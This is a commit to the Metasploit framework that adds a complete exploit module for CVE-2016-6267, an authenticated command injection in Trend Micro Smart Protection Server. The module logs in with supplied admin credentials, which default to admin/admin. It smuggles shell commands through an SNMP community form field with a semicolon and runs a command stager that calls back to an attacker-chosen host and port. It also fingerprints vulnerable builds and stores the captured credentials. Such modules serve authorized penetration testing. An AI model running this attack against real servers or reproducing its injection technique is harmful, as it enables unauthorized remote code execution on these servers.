Land rapid7#7191, Add exploit for CVE-2016-6267 - Trend Micro Smart Protection Server authenticated RCE.

jmartin-tech · jmartin-tech · commit 4ae90cbbefd8 · 2016-11-14T12:06:02.000-06:00
diff --git a/modules/exploits/linux/http/trendmicro_sps_exec.rb b/modules/exploits/linux/http/trendmicro_sps_exec.rb
@@ -0,0 +1,208 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'openssl'
+require 'base64'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Trend Micro Smart Protection Server Exec Remote Code Injection",
+      'Description'    => %q{
+        This module exploits a vulnerability found in TrendMicro Smart Protection Server where untrusted inputs are fed to ServWebExec system command, leading to command injection.
+        Please note: authentication is required to exploit this vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Quentin Kaiser <kaiserquentin[at]gmail.com>'
+        ],
+      'References'     =>
+        [
+          ['CVE-ID', 'CVE-2016-6267']
+        ],
+      'Platform'        => 'linux',
+      'Targets'         => [ [ 'Linux', {} ] ],
+      'Payload'         => { 'BadChars' => "\x00" },
+      'CmdStagerFlavor' => [ 'bourne' ],
+      'Privileged'     => false,
+      'DefaultOptions' =>
+      {
+         'SSL' => true
+      },
+      'DisclosureDate' => "Aug 8 2016",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptBool.new('SSL', [ true, 'Use SSL', true ]),
+        OptString.new('TARGETURI', [true, 'The base path', '/']),
+        OptAddress.new("LHOST", [true, "The local host for the exploits and handlers", Rex::Socket.source_address]),
+        OptPort.new('LPORT', [true, "The port SPS will connect back to ", 4444 ]),
+        OptString.new('ADMINACCOUNT', [true, 'Name of the SPS admin account', 'admin']),
+        OptString.new('ADMINPASS', [true, 'Password of the SPS admin account', 'admin']),
+      ], self.class)
+  end
+
+
+  def check
+    opts = login
+    if opts
+      uri = target_uri.path
+      res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(uri, "php/about.php?sid=#{opts['sid']}"),
+        'headers'=>
+        {
+          'Cookie' => "#{opts["sid"]}=#{opts["sid_value"]}",
+          'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/login.php",
+          'Origin' =>  "https://#{datastore['RHOST']}:#{datastore['RPORT']}",
+        }
+      })
+      if res and res.code == 200
+        version = res.body.to_s.scan(/MSG_ABOUT_VERSION <\/td>[^<]*<td[^>]*>([^<]*)</).last.first.to_f
+        build = res.body.to_s.scan(/MSG_ABOUT_BUILD <\/td>[^<]*<td[^>]*><span[^>]*>([^<]*)</).last.first.to_i(10)
+        print_status("TrendMicro Smart Protection Server detected.")
+        print_status("Version: #{version}")
+        print_status("Build: #{build}")
+        if (version == 3.0 and build < 1330) or
+          (version == 2.6 and build < 2106) or
+          (version == 2.5 and build < 2200)
+            return Exploit::CheckCode::Vulnerable
+        else
+          return Exploit::CheckCode::Safe
+        end
+      end
+    end
+    Exploit::CheckCode::Unknown
+  end
+
+
+  def execute_command(cmd, opts = {})
+    uri = target_uri.path
+    send_request_cgi({
+      'method' => 'POST',
+      'version' => '1.0',
+      'timeout' => 1,
+      'uri' => normalize_uri(uri, 'php/admin_notification.php'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers'=>
+      {
+        'Cookie' => "#{opts["sid"]}=#{opts["sid_value"]}",
+        'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/login.php",
+        'Origin' =>  "https://#{datastore['RHOST']}:#{datastore['RPORT']}",
+      },
+      'vars_post' => {
+        'EnableSNMP' => 'on',
+        'Community' => 'hello',
+        'submit' => 'Save',
+        'pubkey' => '',
+        'spare_EnableSNMP' => 1,
+        'spare_Community' => "test;#{cmd}",
+        'spare_EnableIPRestriction' => 0,
+        'spare_AllowGroupIP' => '',
+        'spare_AllowGroupNetmask' => '',
+        'sid' => opts["sid"]
+      }
+    })
+  end
+
+  def login
+    uri = target_uri.path
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(uri, 'index.php'),
+    })
+    if res and res.code == 200 and !res.get_cookies.empty?
+      sid = res.get_cookies.scan(/([^=]*)=[^;]*;/).last.first.strip
+      sid_value = res.get_cookies.scan(/#{sid}=([a-z0-9]+);/).last.first
+      n = res.body.to_s.scan(/name="pubkey" value="([^"]*)"/).last.first
+      nonce = res.body.to_s.scan(/name="nonce" value="([^"]*)"/).last.first
+      asn1_sequence = OpenSSL::ASN1::Sequence.new(
+        [
+          OpenSSL::ASN1::Integer.new("0x#{n}".to_i(16)),
+          OpenSSL::ASN1::Integer.new("0x10001".to_i(16))
+        ]
+      )
+      public_key = OpenSSL::PKey::RSA.new(asn1_sequence)
+      creds = "#{datastore['ADMINACCOUNT']}\t#{datastore['ADMINPASS']}\t#{nonce}"
+      data = Base64.encode64(public_key.public_encrypt(creds))
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(uri, "auth.php"),
+        'ctype' => 'application/x-www-form-urlencoded',
+        'headers'=>
+        {
+          'Cookie' => "#{sid}=#{sid_value}",
+          'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/login.php",
+          'Origin' =>  "https://#{datastore['RHOST']}:#{datastore['RPORT']}",
+        },
+        'vars_post' => {
+          'data' => data,
+          'sid' => sid
+        }
+      })
+      if res and res.code == 302
+        if res.headers.key?('Set-Cookie')
+          sid = res.get_cookies.scan(/([^=]*)=[^;]*;/).last.first
+          sid_value = res.get_cookies.scan(/#{sid}=([^;]*);/).last.first
+        end
+        report_cred(
+            ip: datastore['RHOST'],
+            port: datastore['RPORT'],
+            service_name: (ssl ? "https" : "http"),
+            user: datastore['ADMINACCOUNT'],
+            password: datastore['ADMINPASS'],
+            proof: "#{sid}=#{sid_value}"
+        )
+        return {"sid" => sid, "sid_value" => sid_value}
+      end
+    end
+    nil
+  end
+
+  def report_cred(opts)
+    service_data = {
+        address: opts[:ip],
+        port: opts[:port],
+        service_name: opts[:service_name],
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+        origin_type: :service,
+        module_fullname: fullname,
+        username: opts[:user],
+        private_data: opts[:password],
+        private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+        core: create_credential(credential_data),
+        status: Metasploit::Model::Login::Status::UNTRIED,
+        proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def exploit
+    opts = login
+    if opts
+      print_status("Successfully logged in.")
+      print_status("Exploiting...")
+      execute_cmdstager(opts=opts)
+    else
+      print_error("An error occured while loggin in.")
+    end
+  end
+end
